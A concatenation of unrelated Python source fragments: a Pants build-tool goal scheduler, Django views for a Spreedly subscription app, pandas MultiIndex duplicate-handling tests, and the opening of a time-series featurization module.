    """Indicates there is a cycle in the goal dependency graph."""

  class TaskOrderError(DependencyError):
    """Indicates a task depends on data produced by another task in the same goal that is
    scheduled to run after it.
    """

  class MissingProductError(DependencyError):
    """Indicates an expressed data dependency is not provided by any installed task."""

  # goal: the Goal; tasktypes_by_name: OrderedDict of task name -> task type;
  # goal_dependencies: set of Goals whose products this goal's tasks consume.
  GoalInfo = namedtuple('GoalInfo', ['goal', 'tasktypes_by_name', 'goal_dependencies'])

  def _topological_sort(self, goal_info_by_goal):
    """Generates GoalInfos such that each goal is yielded before the goals it depends on.

    NOTE: the order is *dependee-first* (sink goals first); callers reverse the
    result to obtain execution order (see ``_prepare``).

    :raises GoalCycleError: if a full pass makes no progress (the graph is cyclic).
    """
    # Map each goal to the set of goals that depend on it.
    dependees_by_goal = OrderedDict()

    def add_dependee(goal, dependee=None):
      # Ensure `goal` has an entry, optionally registering `dependee` as depending on it.
      dependees = dependees_by_goal.get(goal)
      if dependees is None:
        dependees = set()
        dependees_by_goal[goal] = dependees
      if dependee:
        dependees.add(dependee)

    for goal, goal_info in goal_info_by_goal.items():
      add_dependee(goal)
      for dependency in goal_info.goal_dependencies:
        add_dependee(dependency, goal)

    satisfied = set()
    while dependees_by_goal:
      count = len(dependees_by_goal)
      for goal, dependees in dependees_by_goal.items():
        unsatisfied = len(dependees - satisfied)
        if unsatisfied == 0:
          # Everything depending on this goal has been emitted; emit it now and
          # restart iteration since the dict was mutated.
          satisfied.add(goal)
          dependees_by_goal.pop(goal)
          yield goal_info_by_goal[goal]
          break
      if len(dependees_by_goal) == count:
        # No goal was emitted this pass: the remaining goals form a cycle.
        for dependees in dependees_by_goal.values():
          dependees.difference_update(satisfied)
        # TODO(John Sirois): Do a better job here and actually collect and print cycle paths
        # between Goals/Tasks. The developer can most directly address that data.
        raise self.GoalCycleError('Cycle detected in goal dependencies:\n\t{0}'
                                  .format('\n\t'.join('{0} <- {1}'.format(goal, list(dependees))
                                                      for goal, dependees
                                                      in dependees_by_goal.items())))

  class TargetRootsReplacement(object):
    """Accumulates at most one distinct target-root replacement proposal per run."""

    class ConflictingProposalsError(Exception):
      """Indicates conflicting proposals for a target root replacement in a single pants run."""

    def __init__(self):
      self._proposer = None
      self._target_roots = None

    def propose_alternates(self, proposer, target_roots):
      """Record a proposal; re-proposing the same roots is allowed, differing roots are not."""
      if target_roots:
        if self._target_roots and (self._target_roots != target_roots):
          raise self.ConflictingProposalsError(
              'Already have a proposal by {0} for {1} and cannot accept conflicting proposal '
              'by {2} for {3}.'.format(self._proposer, self._target_roots, proposer, target_roots))
        self._proposer = proposer
        self._target_roots = target_roots

    def apply(self, context):
      # Swap the context's target roots if any proposal was accepted.
      if self._target_roots:
        context._replace_targets(self._target_roots)

  def _visit_goal(self, goal, context, goal_info_by_goal, target_roots_replacement):
    """Depth-first visit recording a GoalInfo for `goal` and, recursively, its dependencies."""
    if goal in goal_info_by_goal:
      return

    tasktypes_by_name = OrderedDict()
    goal_dependencies = set()
    visited_task_types = set()
    # Iterate in reverse installed order so that when a producer task is found in
    # `visited_task_types`, it must be scheduled *after* its consumer -> TaskOrderError.
    for task_name in reversed(goal.ordered_task_names()):
      task_type = goal.task_type_by_name(task_name)
      tasktypes_by_name[task_name] = task_type
      visited_task_types.add(task_type)

      # Give each task a chance to propose replacement target roots for the run.
      alternate_target_roots = task_type._alternate_target_roots(context.options,
                                                                 context.address_mapper,
                                                                 context.build_graph)
      target_roots_replacement.propose_alternates(task_type, alternate_target_roots)

      # Collect the product types this task declared it consumes.
      round_manager = RoundManager(context)
      task_type._prepare(context.options, round_manager)
      try:
        dependencies = round_manager.get_dependencies()
        for producer_info in dependencies:
          producer_goal = producer_info.goal
          if producer_goal == goal:
            if producer_info.task_type in visited_task_types:
              ordering = '\n\t'.join("[{0}] '{1}' {2}".format(i, tn,
                                     goal.task_type_by_name(tn).__name__)
                                     for i, tn in enumerate(goal.ordered_task_names()))
              raise self.TaskOrderError(
                  "TaskRegistrar '{name}' with action {consumer_task} depends on {data} from task "
                  "{producer_task} which is ordered after it in the '{goal}' goal:\n\t{ordering}"
                  .format(name=task_name,
                          consumer_task=task_type.__name__,
                          data=producer_info.product_type,
                          producer_task=producer_info.task_type.__name__,
                          goal=goal.name,
                          ordering=ordering))
            else:
              # We don't express dependencies on downstream tasks in this same goal.
              pass
          else:
            goal_dependencies.add(producer_goal)
      except round_manager.MissingProductError as e:
        raise self.MissingProductError(
            "Could not satisfy data dependencies for goal '{name}' with action {action}: {error}"
            .format(name=task_name, action=task_type.__name__, error=e))

    goal_info = self.GoalInfo(goal, tasktypes_by_name, goal_dependencies)
    goal_info_by_goal[goal] = goal_info

    # Recurse into this goal's newly discovered dependencies.
    for goal_dependency in goal_dependencies:
      self._visit_goal(goal_dependency, context, goal_info_by_goal, target_roots_replacement)

  def _prepare(self, context, goals):
    """Generates one GoalExecutor per goal, in execution (dependency-first) order.

    :raises TaskError: if no goals were supplied.
    """
    if len(goals) == 0:
      raise TaskError('No goals to prepare')

    goal_info_by_goal = OrderedDict()
    target_roots_replacement = self.TargetRootsReplacement()
    for goal in reversed(OrderedSet(goals)):
      self._visit_goal(goal, context, goal_info_by_goal, target_roots_replacement)
    target_roots_replacement.apply(context)

    # _topological_sort yields dependee goals first; reverse for execution order.
    for goal_info in reversed(list(self._topological_sort(goal_info_by_goal))):
      yield GoalExecutor(context, goal_info.goal, goal_info.tasktypes_by_name)

  def attempt(self, context, goals):
    """Runs (or explains) the supplied goals, holding the global lock through the
    last serialized goal."""
    goal_executors = list(self._prepare(context, goals))
    execution_goals = ' -> '.join(e.goal.name for e in goal_executors)
    context.log.info('Executing tasks in goals: {goals}'.format(goals=execution_goals))

    explain = context.options.for_global_scope().explain
    if explain:
      print('Goal Execution Order:\n\n{}\n'.format(execution_goals))
      print('Goal [TaskRegistrar->Task] Order:\n')

    # The lock is acquired up front and released as soon as the last serialized
    # goal completes, letting any trailing non-serialized goals run unlocked.
    serialized_goals_executors = [ge for ge in goal_executors if ge.goal.serialize]
    outer_lock_holder = serialized_goals_executors[-1] if serialized_goals_executors else None

    if outer_lock_holder:
      context.acquire_lock()
    try:
      for goal_executor in goal_executors:
        goal_executor.attempt(explain)
        if goal_executor is outer_lock_holder:
          context.release_lock()
          outer_lock_holder = None
    finally:
      # Ensure the lock is released even if a goal raised before reaching the holder.
      if outer_lock_holder:
        context.release_lock()
| |
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.core.exceptions import SuspiciousOperation
from django.utils.decorators import classonlymethod
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_lazy as _
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.auth.models import User
from django.template import RequestContext
from django.core.cache import cache
from django.conf import settings
from django import forms
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import (ListView, TemplateView, View, FormView,
DetailView, UpdateView)
from django.views.generic.edit import FormMixin
from django.core.urlresolvers import reverse
from pyspreedly.api import Client
from spreedly.models import Plan, Subscription
import spreedly.settings as spreedly_settings
from spreedly.forms import SubscribeForm, SubscribeUpdateForm
from spreedly import signals
class SubscribeMixin(FormMixin):
    """
    Inherits from FormMixin; handles get_success_url, form_valid, form_invalid
    and post. Needs to be integrated into get_context_data and get_success_url.
    """
    form_class = SubscribeForm
    success_url = 'spreedly_email_sent'

    def get_success_url(self):
        """Redirect target after a successful subscription."""
        # NOTE(review): this reads `self.request.user_id` -- HttpRequest has no
        # such attribute in stock Django; confirm it is set by middleware, or
        # whether `self.kwargs['user_id']` was intended.
        return reverse(self.success_url, args=[self.request.user_id])

    def form_valid(self, form):
        """Save the subscription form and redirect to the success URL."""
        form.save()
        # Bug fix: the parent's redirect response was computed but dropped
        # (no `return`), making the view return None on valid POSTs.
        return super(SubscribeMixin, self).form_valid(form)

    def form_invalid(self, form):
        """Re-render the page with the bound (invalid) form and its errors."""
        # Bug fix: the rendered response was discarded (no `return`).
        return self.render_to_response(self.get_context_data(
            object_list=self.object_list, form=form))

    def post(self, request=None, *args, **kwargs):
        """Validate the submitted form and dispatch to form_valid/form_invalid.

        Bug fix: Django invokes ``view.post(request, *args, **kwargs)``; the
        previous zero-argument signature raised TypeError on every POST. The
        request is also available as ``self.request`` so it is accepted here
        only for signature compatibility.
        """
        form_class = self.get_form_class()
        form = self.get_form(form_class)
        if form.is_valid():
            return self.form_valid(form)
        else:
            return self.form_invalid(form)
class PlanList(SubscribeMixin, ListView):
    """
    Hybrid list + subscription-entry view, inheriting from :py:class:`ListView`
    and :py:class:`FormMixin` (via SubscribeMixin).

    default template name is `spreedly/plan_list.html`,
    object_list name is `plans`.

    Caches the plan list for 24 hours.
    """
    template_name = "spreedly/plan_list.html"
    model = Plan
    context_object_name = 'plans'

    def get_context_data(self, object_list, **kwargs):
        """
        Adds form and object list plus whatever else is passed as a kwarg
        to the context.

        :param object_list: list of :py:class:`Plan`s (actually queryset)
        """
        # Merge context from both parent classes explicitly rather than via super(),
        # since both sides of the diamond contribute context.
        context = ListView.get_context_data(self, object_list=object_list)
        context.update(SubscribeMixin.get_context_data(self, **kwargs))
        # NOTE(review): `is_authenticated()` is invoked as a method -- correct for
        # Django < 1.10 where it was callable; it became a property later.
        if self.request.user.is_authenticated():
            try:
                context['current_user_subscription'] = self.request.user.subscription
            except Subscription.DoesNotExist:
                context['current_user_subscription'] = None
        return context

    def get_queryset(self):
        """
        Gets and caches the plan list for 1 day.
        """
        cache_key = 'spreedly_plans_list'
        plans = cache.get(cache_key)
        # On a cache miss (or an empty cached queryset, which is also falsy),
        # re-sync plans from the Spreedly API before caching.
        if not plans:
            Plan.objects.sync_plans()
            plans = Plan.objects.enabled()
            cache.set(cache_key, plans, 60*60*24)
        return plans

    def get(self, *args, **kwargs):
        """
        Gets the form and object list and returns a rendered template.
        """
        form_class = self.get_form_class()
        form = self.get_form(form_class)
        self.object_list = self.get_queryset()
        allow_empty = self.get_allow_empty()
        if not allow_empty and len(self.object_list) == 0:
            raise Http404(_(u"Empty list and '%(class_name)s.allow_empty' is False.")
                          % {'class_name': self.__class__.__name__})
        context = self.get_context_data(object_list=self.object_list, form=form, **kwargs)
        return self.render_to_response(context)
class EmailSent(TemplateView):
    """Post-registration "thank you" page confirming that an email was sent."""

    template_name = 'spreedly/email_sent.html'

    def get_context_data(self, *args, **kwargs):
        """Add the registering user (looked up from the `user_id` URL kwarg) to the context."""
        context = super(EmailSent, self).get_context_data(*args, **kwargs)
        context['user'] = get_object_or_404(User, pk=self.kwargs['user_id'])
        self.context_data = context
        return self.context_data
class SpreedlyReturn(TemplateView):
    """Landing page users return to after completing signup on Spreedly."""

    template_name = 'spreedly/return.html'

    def create_subscription(self, user, plan):
        """Create the local subscription (or start a trial) for `user` on `plan`.

        :raises SuspiciousOperation: if a trial is requested but the user is
            not eligible for one.
        """
        # Fix: dict.has_key() was removed in Python 3; membership test is the
        # exact equivalent.
        if 'trial' in self.request.GET or plan.plan_type == 'free_trial':
            if plan.trial_eligible(user):
                subscription = plan.start_trial(user)
            else:
                raise SuspiciousOperation("Trial asked for - but you are not eligibile for a free trial")
        else:
            subscription = Subscription.objects.create_local(user, plan)
        return subscription

    def get_context_data(self, plan, subscription, *args, **kwargs):
        """Add plan, subscription and optional `next` URL to the template context."""
        # removed gift, request and login url
        self.context_data = super(SpreedlyReturn, self).get_context_data(*args, **kwargs)
        self.context_data['plan'] = plan
        # Fix: has_key() -> `in` (Python 3 compatibility, behavior unchanged).
        if 'next' in self.request.GET:
            self.context_data['next'] = self.request.GET['next']
        self.context_data['subscription'] = subscription
        return self.context_data

    def get(self, request, *args, **kwargs):
        """Create the subscription for the user/plan in the URL and render the page."""
        user = get_object_or_404(User, pk=self.kwargs['user_id'])
        plan = get_object_or_404(Plan, pk=self.kwargs['plan_pk'])
        subscription = self.create_subscription(user, plan)
        context_data = self.get_context_data(plan, subscription, **kwargs)
        return self.render_to_response(context_data)
@csrf_exempt
def spreedly_listener(request):
    """Webhook endpoint Spreedly POSTs to when subscribers change.

    Expects a `subscriber_ids` form field containing a comma-separated list of
    subscriber ids; each subscriber's current state is re-fetched from the
    Spreedly API and mirrored onto the local Subscription. Always responds
    200 OK so Spreedly does not retry.
    """
    if request.method == 'POST':
        # Try to extract customers' IDs.
        # Fix: QueryDict.has_key() was removed in Python 3; `in` is equivalent.
        if 'subscriber_ids' in request.POST:
            subscriber_ids = request.POST['subscriber_ids'].split(',')
            if subscriber_ids:
                client = Client(settings.SPREEDLY_AUTH_TOKEN, settings.SPREEDLY_SITE_NAME)
                for id in subscriber_ids:
                    # Now let's query Spreedly API for the actual changes.
                    data = client.get_info(int(id))
                    try:
                        user = User.objects.get(pk=id)
                        subscription, created = Subscription.objects.get_or_create(user=user)
                        # Mirror every attribute the local model also has.
                        for k, v in data.items():
                            if hasattr(subscription, k):
                                setattr(subscription, k, v)
                        subscription.save()
                        signals.subscription_update.send(sender=subscription,
                                                         user=User.objects.get(id=id))
                    except User.DoesNotExist:
                        # TODO not sure what exactly to do here. Delete the subscripton on spreedly?
                        pass
    return HttpResponse()  # 200 OK
class SubscriptionDetails(DetailView):
    """
    view to see subscription details. takes subscription id as an optional
    parameter. if it is not there return the user's subscription if available,
    if not 404. if user.is_staff() - then you can see any Subscription details.
    """
    model = Subscription
    context_object_name = 'subscription'
    template_name = 'spreedly/subscription_details.html'
    # The Subscription pk is taken from the `user_id` URL kwarg.
    pk_url_kwarg = 'user_id'

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        # Default to the requesting user's own subscription when no user_id was
        # supplied in the URL.
        if not kwargs or not kwargs.get('user_id'):
            kwargs['user_id'] = request.user.id
        return super(SubscriptionDetails, self).dispatch(request, *args, **kwargs)
class PlanDetails(DetailView, SubscribeMixin):
    """Detail page for a single Plan with an attached, pre-filled subscribe form."""
    model = Plan
    # Both the pk and slug URL kwargs map to `plan_pk`.
    pk_url_kwarg = 'plan_pk'
    slug_url_kwarg = 'plan_pk'
    context_object_name = 'plan'
    template_name = 'spreedly/plan_details.html'

    def get_context_data(self, **kwargs):
        # Only DetailView's context is built here; the form is injected via the
        # kwargs prepared in get().
        context = DetailView.get_context_data(self, **kwargs)
        # NOTE(review): `is_authenticated()` is called as a method (Django < 1.10).
        if self.request.user.is_authenticated():
            context['current_user_subscription'] = getattr(self.request.user, 'subscription', None)
        else:
            context['current_user_subscription'] = None
        return context

    def get(self, *args, **kwargs):
        self.object = self.get_object()
        kwargs['object'] = self.object
        form_class = self.get_form_class()
        form = self.get_form(form_class)
        # Pre-select this plan and hide the selector from the user.
        form.fields['subscription'].widget = forms.HiddenInput()
        form.fields['subscription'].initial = self.object
        kwargs['form'] = form
        context = self.get_context_data(**kwargs)
        return self.render_to_response(context)
class EditSubscriber(UpdateView):
    """Placeholder view for editing a subscription; deliberately not implemented yet."""
    model = Subscription
    # NOTE(review): Django's UpdateView reads `form_class`, not `form`; this
    # attribute is currently unused -- confirm intent before relying on it.
    form = SubscribeUpdateForm

    def dispatch(self, *args, **kwargs):
        # Explicitly disabled until the edit flow is implemented.
        raise NotImplementedError
| |
# -*- coding: utf-8 -*-
from itertools import product
import numpy as np
import pytest
from pandas._libs import hashtable
from pandas.compat import range, u
from pandas import DatetimeIndex, MultiIndex
import pandas.util.testing as tm
@pytest.mark.parametrize('names', [None, ['first', 'second']])
def test_unique(names):
    """MultiIndex.unique drops duplicate label tuples and preserves names."""
    cases = [
        # (input arrays, expected unique arrays)
        ([[1, 2, 1, 2], [1, 1, 1, 2]], [[1, 2, 2], [1, 1, 2]]),
        ([list('aaaa'), list('abab')], [list('aa'), list('ab')]),
        ([list('aaaa'), list('aaaa')], [['a'], ['a']]),
    ]
    for arrays, expected_arrays in cases:
        mi = MultiIndex.from_arrays(arrays, names=names)
        exp = MultiIndex.from_arrays(expected_arrays, names=mi.names)
        tm.assert_index_equal(mi.unique(), exp)

    # GH #20568 - an empty MultiIndex is already unique
    mi = MultiIndex.from_arrays([[], []], names=names)
    tm.assert_index_equal(mi, mi.unique())
def test_unique_datetimelike():
    """unique() on datetime levels, including NaT and tz-aware values."""
    naive = DatetimeIndex(['2015-01-01', '2015-01-01', '2015-01-01',
                           '2015-01-01', 'NaT', 'NaT'])
    aware = DatetimeIndex(['2015-01-01', '2015-01-01', '2015-01-02',
                           '2015-01-02', 'NaT', '2015-01-01'],
                          tz='Asia/Tokyo')

    result = MultiIndex.from_arrays([naive, aware]).unique()

    expected_naive = DatetimeIndex(['2015-01-01', '2015-01-01', 'NaT', 'NaT'])
    expected_aware = DatetimeIndex(['2015-01-01', '2015-01-02',
                                    'NaT', '2015-01-01'],
                                   tz='Asia/Tokyo')
    expected = MultiIndex.from_arrays([expected_naive, expected_aware])
    tm.assert_index_equal(result, expected)
@pytest.mark.parametrize('level', [0, 'first', 1, 'second'])
def test_unique_level(idx, level):
    """unique(level=...) matches get_level_values(level).unique() (GH #17896)."""
    # GH #17896 - with level= argument
    result = idx.unique(level=level)
    expected = idx.get_level_values(level).unique()
    tm.assert_index_equal(result, expected)

    # With already unique level
    mi = MultiIndex.from_arrays([[1, 3, 2, 4], [1, 3, 2, 5]],
                                names=['first', 'second'])
    result = mi.unique(level=level)
    expected = mi.get_level_values(level)
    tm.assert_index_equal(result, expected)

    # With empty MI
    mi = MultiIndex.from_arrays([[], []], names=['first', 'second'])
    result = mi.unique(level=level)
    expected = mi.get_level_values(level)
    # Bug fix: result/expected were computed here but never compared, so the
    # empty-MultiIndex branch silently verified nothing.
    tm.assert_index_equal(result, expected)
@pytest.mark.parametrize('dropna', [True, False])
def test_get_unique_index(idx, dropna):
    """_get_unique_index returns the distinct entries of a duplicated MultiIndex."""
    mi = idx[[0, 1, 0, 1, 1, 0, 0]]
    expected = mi._shallow_copy(mi[[0, 1]])

    result = mi._get_unique_index(dropna=dropna)
    # Bug fix: `result.unique` is a bound method and therefore always truthy,
    # so the original assertion could never fail; assert the property instead.
    assert result.is_unique
    tm.assert_index_equal(result, expected)
def test_duplicate_multiindex_codes():
    """Duplicate values within a single level raise ValueError (GH 17464)."""
    # Constructing with a duplicated level must fail outright.
    with pytest.raises(ValueError):
        MultiIndex([['A'] * 10, range(10)], [[0] * 10, range(10)])

    # ...and so must introducing duplicates afterwards via set_levels.
    mi = MultiIndex.from_arrays([['A', 'A', 'B', 'B', 'B'],
                                 [1, 2, 1, 2, 3]])
    with pytest.raises(ValueError):
        mi.set_levels([['A', 'B', 'A', 'A', 'B'], [2, 1, 3, -2, 5]],
                      inplace=True)
@pytest.mark.parametrize('names', [['a', 'b', 'a'], [1, 1, 2],
                                   [1, 'a', 1]])
def test_duplicate_level_names(names):
    """Duplicate level names are accepted at construction and via rename (GH18872, GH19029)."""
    mi = MultiIndex.from_product([[0, 1]] * 3, names=names)
    assert mi.names == names

    # Renaming the whole index at once
    renamed = MultiIndex.from_product([[0, 1]] * 3).rename(names)
    assert renamed.names == names

    # Renaming level-by-level, both in place and by copy
    renamed.rename(names[1], level=1, inplace=True)
    renamed = renamed.rename([names[0], names[2]], level=[0, 2])
    assert renamed.names == names
def test_duplicate_meta_data():
    """drop_duplicates preserves level names regardless of how they were set (GH 10115)."""
    base = MultiIndex(
        levels=[[0, 1], [0, 1, 2]],
        codes=[[0, 0, 0, 0, 1, 1, 1],
               [0, 1, 2, 0, 0, 1, 2]])

    variants = [
        base,
        base.set_names([None, None]),
        base.set_names([None, 'Num']),
        base.set_names(['Upper', 'Num']),
    ]
    for idx in variants:
        assert idx.has_duplicates
        assert idx.drop_duplicates().names == idx.names
def test_has_duplicates(idx, idx_dup):
    """is_unique / has_duplicates are consistent opposites, NaN entries included."""
    # see fixtures: `idx` is unique, `idx_dup` contains repeats
    assert idx.is_unique is True
    assert idx.has_duplicates is False
    assert idx_dup.is_unique is False
    assert idx_dup.has_duplicates is True

    cases = [
        # (levels, codes, expected is_unique)
        ([[0, 1], [0, 1, 2]],
         [[0, 0, 0, 0, 1, 1, 1], [0, 1, 2, 0, 0, 1, 2]], False),
        # a single NaN entry (code -1) is not a duplicate
        ([['a', 'b'], [0, 1]],
         [[-1, 0, 0, 1, 1], [-1, 0, 1, 0, 1]], True),
        # multiple NaN entries are
        ([['a', 'b'], [0, 1]],
         [[-1, -1, 0, 0, 1, 1], [-1, -1, 0, 1, 0, 1]], False),
    ]
    for levels, codes, unique in cases:
        mi = MultiIndex(levels=levels, codes=codes)
        assert mi.is_unique is unique
        assert mi.has_duplicates is (not unique)
def test_has_duplicates_from_tuples():
    """MultiIndex.from_tuples of distinct wide tuples reports no duplicates (GH 9075)."""
    # Fix: dropped the `u()` wrappers from the long-removed pandas.compat
    # module. For these ASCII literals the text/bytes distinction does not
    # affect tuple equality or hashing on either Python 2 or 3, so behavior
    # is unchanged while the dead compat dependency goes away.
    t = [('x', 'out', 'z', 5, 'y', 'in', 'z', 169),
         ('x', 'out', 'z', 7, 'y', 'in', 'z', 119),
         ('x', 'out', 'z', 9, 'y', 'in', 'z', 135),
         ('x', 'out', 'z', 13, 'y', 'in', 'z', 145),
         ('x', 'out', 'z', 14, 'y', 'in', 'z', 158),
         ('x', 'out', 'z', 16, 'y', 'in', 'z', 122),
         ('x', 'out', 'z', 17, 'y', 'in', 'z', 160),
         ('x', 'out', 'z', 18, 'y', 'in', 'z', 180),
         ('x', 'out', 'z', 20, 'y', 'in', 'z', 143),
         ('x', 'out', 'z', 21, 'y', 'in', 'z', 128),
         ('x', 'out', 'z', 22, 'y', 'in', 'z', 129),
         ('x', 'out', 'z', 25, 'y', 'in', 'z', 111),
         ('x', 'out', 'z', 28, 'y', 'in', 'z', 114),
         ('x', 'out', 'z', 29, 'y', 'in', 'z', 121),
         ('x', 'out', 'z', 31, 'y', 'in', 'z', 126),
         ('x', 'out', 'z', 32, 'y', 'in', 'z', 155),
         ('x', 'out', 'z', 33, 'y', 'in', 'z', 123),
         ('x', 'out', 'z', 12, 'y', 'in', 'z', 144)]

    mi = MultiIndex.from_tuples(t)
    assert not mi.has_duplicates
def test_has_duplicates_overflow():
    """has_duplicates remains correct when combined codes overflow int64 packing."""
    # handle int64 overflow if possible
    def check(nlevels, with_nulls):
        # Base codes: each value 0..499 appears twice; the extra level below
        # disambiguates the two copies so the index starts out duplicate-free.
        codes = np.tile(np.arange(500), 2)
        level = np.arange(500)

        if with_nulls:  # inject some null values
            codes[500] = -1  # common nan value
            codes = [codes.copy() for i in range(nlevels)]
            # Stagger one extra NaN per level so the levels are not identical.
            for i in range(nlevels):
                codes[i][500 + i - nlevels // 2] = -1

            codes += [np.array([-1, 1]).repeat(500)]
        else:
            codes = [codes] * nlevels + [np.arange(2).repeat(500)]

        levels = [level] * nlevels + [[0, 1]]

        # no dups
        mi = MultiIndex(levels=levels, codes=codes)
        assert not mi.has_duplicates

        # with a dup
        if with_nulls:
            # Re-insert the first row's codes at position 1000 in every level.
            def f(a):
                return np.insert(a, 1000, a[0])
            codes = list(map(f, codes))
            mi = MultiIndex(levels=levels, codes=codes)
        else:
            # Append a copy of the first tuple instead.
            values = mi.values.tolist()
            mi = MultiIndex.from_tuples(values + [values[0]])

        assert mi.has_duplicates

    # no overflow: the combined level cardinality still fits in int64
    check(4, False)
    check(4, True)

    # overflow possible
    check(8, False)
    check(8, True)
@pytest.mark.parametrize('keep, expected', [
    ('first', np.array([False, False, False, True, True, False])),
    ('last', np.array([False, True, True, False, False, False])),
    (False, np.array([False, True, True, True, True, False]))
])
def test_duplicated(idx_dup, keep, expected):
    """duplicated() honors keep='first'/'last'/False on a MultiIndex with repeats."""
    tm.assert_numpy_array_equal(idx_dup.duplicated(keep=keep), expected)
@pytest.mark.parametrize('keep', ['first', 'last', False])
def test_duplicated_large(keep):
    """duplicated() agrees with the hashtable implementation on large inputs (GH 9125)."""
    n_level_values, repeat_factor = 200, 5000
    levels = [np.arange(n_level_values),
              tm.makeStringIndex(n_level_values),
              1000 + np.arange(n_level_values)]
    codes = [np.random.choice(n_level_values, repeat_factor * n_level_values)
             for _ in levels]
    mi = MultiIndex(levels=levels, codes=codes)

    expected = hashtable.duplicated_object(mi.values, keep=keep)
    tm.assert_numpy_array_equal(mi.duplicated(keep=keep), expected)
def test_get_duplicates():
    """Deprecated MultiIndex.get_duplicates() is empty for unique indexes (GH5873)."""
    # Two-entry indexes (second entry possibly equal in level 0, NaN in level 1)
    # are never duplicated as tuples.
    for a in [101, 102]:
        mi = MultiIndex.from_arrays([[101, a], [3.5, np.nan]])
        assert not mi.has_duplicates

        with tm.assert_produces_warning(FutureWarning):
            # Deprecated - see GH20239
            assert mi.get_duplicates().equals(MultiIndex.from_arrays([[], []]))
        tm.assert_numpy_array_equal(mi.duplicated(),
                                    np.zeros(2, dtype='bool'))

    for n in range(1, 6):  # 1st level shape
        for m in range(1, 5):  # 2nd level shape
            # all possible unique combinations, including nan (code -1)
            codes = product(range(-1, n), range(-1, m))
            mi = MultiIndex(levels=[list('abcde')[:n], list('WXYZ')[:m]],
                            codes=np.random.permutation(list(codes)).T)
            # (n + 1) * (m + 1) because code -1 (NaN) adds one value per level.
            assert len(mi) == (n + 1) * (m + 1)
            assert not mi.has_duplicates

            with tm.assert_produces_warning(FutureWarning):
                # Deprecated - see GH20239
                assert mi.get_duplicates().equals(MultiIndex.from_arrays(
                    [[], []]))
            tm.assert_numpy_array_equal(mi.duplicated(),
                                        np.zeros(len(mi), dtype='bool'))
| |
import copy
from collections import Iterable
import numpy as np
import pandas as pd
import dask
import dask.threaded
from dask import delayed
from dask.compatibility import reraise
from dask.threaded import pack_exception
from sklearn.preprocessing import Imputer
from . import time_series
from .time_series import TimeSeries
from .features import generate_dask_graph
__all__ = ['featurize_time_series', 'featurize_single_ts',
'featurize_ts_files', 'assemble_featureset']
def featurize_single_ts(ts, features_to_use, custom_script_path=None,
                        custom_functions=None, raise_exceptions=True):
    """Compute feature values for a given single time-series.

    Parameters
    ----------
    ts : TimeSeries object
        Single time series to be featurized.
    features_to_use : list of str
        List of feature names to be generated.
    custom_script_path : str, optional
        Accepted for API compatibility with `featurize_time_series`; not used
        by this function.
    custom_functions : dict, optional
        Dictionary of custom feature functions to be evaluated for the given
        time series, or a dictionary representing a dask graph of function
        evaluations. Dictionaries of functions should have keys `feature_name`
        and values functions that take arguments (t, m, e); in the case of a
        dask graph, these arrays should be referenced as 't', 'm', 'e',
        respectively, and any values with keys present in `features_to_use`
        will be computed.
    raise_exceptions : bool, optional
        If True, exceptions during feature computation are raised immediately;
        if False, exceptions are supressed and `np.nan` is returned for the
        given feature and any dependent features. Defaults to True.

    Returns
    -------
    pd.Series
        Feature values with a (feature, channel) MultiIndex -- one value per
        requested feature per channel.
    """
    # Initialize empty feature array for all channels: one row per feature,
    # one column per channel.
    feature_values = np.empty((len(features_to_use), ts.n_channels))
    for (t_i, m_i, e_i), i in zip(ts.channels(), range(ts.n_channels)):
        feature_graph = generate_dask_graph(t_i, m_i, e_i)
        # Meta-features are injected as precomputed graph values so custom
        # feature functions can consume them by key.
        feature_graph.update(ts.meta_features)

        if custom_functions:
            # If values in custom_functions are functions, add calls to graph
            if all(hasattr(v, '__call__') for v in custom_functions.values()):
                feature_graph.update({feat: f(t_i, m_i, e_i)
                                      for feat, f in custom_functions.items()})
            # Otherwise, custom_functions is another dask graph
            else:
                feature_graph.update(custom_functions)

        # Do not execute in parallel; parallelization has already taken place
        # at the level of time series, so we compute features for a single time
        # series in serial.
        if raise_exceptions:
            raise_callback = reraise
        else:
            # Swallow the exception; the failed value surfaces as np.nan below.
            raise_callback = lambda e, tb: None
        # NOTE(review): relies on dask's synchronous get accepting
        # raise_exception/pack_exception callbacks -- an older dask API;
        # confirm against the pinned dask version.
        dask_values = dask.get(feature_graph, features_to_use,
                               raise_exception=raise_callback,
                               pack_exception=pack_exception)
        feature_values[:, i] = [x if not isinstance(x, Exception) else np.nan
                                for x in dask_values]
    index = pd.MultiIndex.from_product((features_to_use, range(ts.n_channels)),
                                       names=('feature', 'channel'))
    return pd.Series(feature_values.ravel(), index=index)
def assemble_featureset(features_list, time_series=None,
                        meta_features_list=None, names=None):
    """Combine per-time-series feature Series into a single feature DataFrame.

    Parameters
    ----------
    features_list : list of pd.Series
        One Series per time series, indexed by a (feature, channel) MultiIndex
        (as produced by `featurize_single_ts`).
    time_series : list of TimeSeries, optional
        When given, each series' `meta_features` and `name` override the
        `meta_features_list` and `names` arguments.
    meta_features_list : list of dict, optional
        Per-time-series metadata appended as extra columns.
    names : list of str, optional
        Row index for the resulting featureset.

    Returns
    -------
    pd.DataFrame
        One row per time series, one column per (feature, channel) pair.
    """
    if time_series is not None:
        pairs = [(ts.meta_features, ts.name) for ts in time_series]
        meta_features_list, names = zip(*pairs)

    if features_list:
        feature_frame = pd.concat(features_list, axis=1, ignore_index=True).T
        feature_frame.index = names
    else:
        feature_frame = pd.DataFrame(index=names)

    # Append metadata columns unless every metadata dict is empty.
    if meta_features_list and any(meta_features_list):
        meta_frame = pd.DataFrame(list(meta_features_list), index=names)
        meta_frame.columns = pd.MultiIndex.from_tuples(
            [(column, '') for column in meta_frame],
            names=['feature', 'channel'])
        feature_frame = pd.concat((feature_frame, meta_frame), axis=1)

    return feature_frame
# TODO should this be changed to use TimeSeries objects? or maybe an optional
# argument for TimeSeries? some redundancy here...
def featurize_time_series(times, values, errors=None, features_to_use=None,
                          meta_features=None, names=None,
                          custom_script_path=None, custom_functions=None,
                          scheduler=dask.threaded.get, raise_exceptions=True):
    """Versatile feature generation function for one or more time series.

    For a single time series, inputs may have the form:

    - `times`: (n,) array or (p, n) array (for p channels of measurement)
    - `values`: (n,) array or (p, n) array (for p channels of measurement)
